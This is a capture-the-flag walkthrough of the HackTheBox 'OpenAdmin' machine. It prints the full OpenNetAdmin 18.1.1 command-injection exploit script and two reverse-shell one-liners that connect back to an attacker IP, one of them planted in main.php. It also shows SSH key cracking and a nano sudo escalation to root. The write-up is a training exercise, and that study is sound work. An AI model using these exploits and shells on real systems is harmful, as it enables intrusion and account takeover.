To those who are bold enough to knock!

HackTheBox OpenAdmin Machine Info Card

OpenAdmin is an easy difficulty machine running Linux. It tests your knowledge in OSINT, exploitation through a publicly known exploit and basic privilege escalation using a GTFOBin.

Be sure to checkout the Basic Setup section before you get started.


Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.


portscan openadmin.htb 
Grabbing ports...
Ports grabbed!
Starting Nmap 7.80 ( ) at 2020-01-04 22:52 PST
Nmap scan report for openadmin.htb (
Host is up (0.23s latency).

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 14.73 seconds

We have two open ports. SSH on port 22 and Apache on port 80 which we can see goes to the deault ubuntu It Works page.

Directory Bruteforce

Since that page seems like a dead end let’s check for any other directories that may be available:

gobuster dir -u http://openadmin.htb -t 10 -w /usr/share/wordlists/dirb/big.txt -o gobuster_dir.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:            http://openadmin.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/01/04 22:23:56 Starting gobuster
/artwork (Status: 301)
/music (Status: 301)
/server-status (Status: 403)
/sierra (Status: 301)
2020/01/04 22:25:01 Finished

Let’s take a look at each of the directories we have found.


We have http://openadmin.htb/artwork/ which is a business website for Arcwork:

Arcwork Screenshot

Nothing seems to stand out at first glance and a quick view of the source reveals nothing interesting.


Navigating to http://openadmin.htb/sierra/ we see another business site called Sierra:

Sierra Screenshot

I am starting to think there is a theme here. Web hosting or design company?

Sierra also doesn’t show anything interesting on the site or within the source.


Taking a look at http://openadmin.htb/music/ we have another business site called SolMusic:

SolMusic Screenshot

The first thing that catches our eye in comparison to the other sites is that this site has a Login link in the navbar.


The link takes us to http://openadmin.htb/ona/ where we come across this page:

OpenNetAdmin Screenshot

Something that is interesting is the Newer Version Available alert that lists the version v18.1.1. Although there is no direct mention of what the web application is there is also a link to ` DOWNLOAD the latest version`.

The download link takes us to which is web application that keeps a database managed inventory of your IP network:

ONA Download Screenshot

Looks like we have found our openadmin reference and most likely our way in!


Let’s checkout OpenNetAdmin and see if there are any vulnerabilities available for that version:

searchsploit opennetadmin 18.1.1
 Exploit Title                                      |  Path
                                                    | (/usr/share/exploitdb/)
OpenNetAdmin 18.1.1 - Remote Code Execution         | exploits/php/webapps/
Shellcodes: No Result
Papers: No Result

We find one RCE exploit. Let’s check it out and see what we have got:

searchsploit -x exploits/php/webapps/
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage:
# Software Link:
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage:
# Software Link:
# Version: v18.1.1
# Tested on: Linux


while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

Pretty straight forward. The script takes a url as an argument and then using curl with the -d option that sends HTTP POST data. That data is the injection and execution of arbitrary PHP code namingly Ping Command Injection.

Lets go ahead and copy the contents to a file called and see if we can get a shell:

while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

And make the script executable:

chmod +x

Now all that’s left is to give it a run:

./ http://openadmin.htb/ona/
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We gain a shell and have access as the www-data user of which will most likely have limited access. We will need to move to another user.

Before we go ahead and do that let’s try and gain a netcat connection so we can upgrade our shell. The nc we have access to doesn’t support the -e option so we will have to do some shell redirect magic.

First off we will set our netcat listener on our attacker machine:

nc -nvlp 1234

We then run the following commands on the victim to receive our connection:

mknod /tmp/backpipe p;/bin/sh -c "/bin/sh 0</tmp/backpipe | nc <attacker-ip> 1234 1>/tmp/backpipe"

From here we can upgrade our shell taking note that the victim machine only has python3 installed.


Now we can see what other users we have and check their directory permissions while we are at it:

ls -l /home
total 8
drwxr-x--- 5 jimmy  jimmy  4096 Nov 22 23:15 jimmy
drwxr-x--- 6 joanna joanna 4096 Nov 28 09:37 joanna

So we have two users to work with!

Because we are looking at taking over another account we will search for any information leakage like passwords, ssh keys and the likes as well as keeping an eye out for privesc to root. You just never know.

Having a look at OpenNetAdmin’s files it is obvious that the web application requires a database. A quick check shows that there is MySQL running:

ps -aux | grep mysql
mysql     1044  0.1 11.3 1633604 232332 ?      Sl   12:28   0:14 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/
www-data 12798  0.0  0.0  11464  1104 pts/0    S+   14:48   0:00 grep mysql 

A search of the interweb using the term opennetadmin database password reveals some info that might be of use here.

Let’s check out the file mentioned:

grep passwd /opt/ona/www/local/config/
'db_passwd' => 'n1....0R!',

We find a password! Let’s give ssh a try and see if we get access:

ssh jimmy@openadmin.htb
jimmy@openadmin.htbs password: 

On inspection of jimmy’s home folder we see that there is no user.txt file. This means we are going to neeed to gain access to joannas account.

Let’s see where jimmy has read and write access:

find / -regextype posix-extended -regex "/(sys|srv|proc|run)" -prune -o -user <username> -ls 2>&1 | grep -v "Permission denied"
				.......................... snip ..........................
   286763      4 drwxrwx---   2 jimmy    internal     4096 Jan  5 12:46 /var/www/internal
   282830      4 -rwxrwxr-x   1 jimmy    internal      389 Jan  5 12:46 /var/www/internal/main.php
     2644      4 -rwxrwxr-x   1 jimmy    internal      185 Nov 23 16:37 /var/www/internal/logout.php
     1387      4 -rwxrwxr-x   1 jimmy    internal     3229 Nov 22 23:24 /var/www/internal/index.php
				.......................... snip ..........................

Taking a look at these files we see that index.php is a login page that seems to accept the username and password of jimmy and main.php has shell_exec('cat /home/joanna/.ssh/id_rsa'); which would output joanna’s SSH key. That is exactly what we are after. We also see Don't forget your "ninja" password. Don’t worry we won’t ;)

These files aren’t in http://openadmin.htb’s root folder. Maybe there is a vhost linking to this location that we haven’t found? Let’s check the apache config:

ls -l /etc/apache2/sites-available/
total 16
-rw-r--r-- 1 root root 6338 Jul 16 18:14 default-ssl.conf
-rw-r--r-- 1 root root  303 Nov 23 17:13 internal.conf
-rw-r--r-- 1 root root 1329 Nov 22 14:24 openadmin.conf

There it is! Taking a look at internal.conf we find what we are looking for:

cat /etc/apache2/sites-available/internal.conf 

    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined


We see that apache is listening on and a quick curl -u jimmy:n1....0R! outputs the contents of index.php.

Running main.php we see that joanna’s SSH key is printed:

curl -u jimmy:n1....0R!
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

            .... SNIP ....        ....SNIP....
<h3>Dont forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

Path 1 - SSH Key

Since we have joanna’s SSH key we can try cracking it. Copy the key to a file on the attacker machine such as id_rsa.

We will then convert the key to a crackable hash:

ssh2john id_rsa > id_rsa-hash

We can then try cracking it with john:

john --wordlist=/root/wordlists/passwords/passwords.txt id_rsa-hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status      (/root/Documents/openadmin/id_rsa-joanna)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:10 DONE (2020-01-14 18:21) 0.09596g/s 1376Kp/s 1376Kc/s 1376KC/sa6_123..*7¡Vamos!
Session completed

NOTE: I don’t use just rockyou.txt. The passwords.txt is a custom created wordlist made from multiple wordlists stripped of all duplicates. You may need to do the same!

We retrieve the SSH passphrase and can now login via SSH using the id_rsa key:

ssh -i id_rsa-joanna joanna@openadmin.htb
Enter passphrase for key 'id_rsa-joanna':
Last login: Tue Jan 14 18:20:08 2020 from
joanna@openadmin:~$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

Path 2 - Alter Script

With this script we have command execution as joanna so all we have to do is grab a shell.

So we will edit main.php and replace cat /home/joanna/.ssh/id_rsa with /bin/bash -c 'bash -i >& /dev/tcp/<attacker-ip>/1234 0>&1'.

Then we setup our netcat listener on our attacker machine:

nc -lvp 1234

Now let’s try running main.php using jimmy’s username and password:

curl -u jimmy:n1....0R!

Back at our listener we should receive a connection:

Ncat: Listening on :::1234
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
joanna@openadmin:/var/www$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

Now we can go for our user flag:

joanna@openadmin:/var/www$ cat /home/joanna/user.txt

And there we have it! We have our user.txt.


Let’s check to see if we have any sudo privileges.

If we used Path 2 and altered the script then we find that we receive the following error:

sudo -l
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin

We can create an ssh key pair and throw the public key in /home/joanna/.ssh/authorized_keys then we can login via ssh.

sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

We see that we can run nano with sudo and without a password to open the file /opt/priv. Since nano is a GTFOBin we will be able to gain root.

To do so we open our file with nano and then type CTRL+R and then CTRL+X to bring up the Command to execute prompt. We then type in reset; sh 1>&0 2>&0 like so:

Nano GTFOBin Screenshot

That was a nice and easy root :)


This was an interesting machine that had a fair few websites that could have sent some people on a wild goose chase. Focusing on important links like logins can be fruitful. Misconfigurations and outdated software can easily lead to a compromise in the real world. The privilege escalation to root once again outlines the issue with “ease of use” methods such as using sudo without a password. Sadly this is a common realworld situation where people attempt to automate a task that involves a script needing escalated privileges.

Hack The Box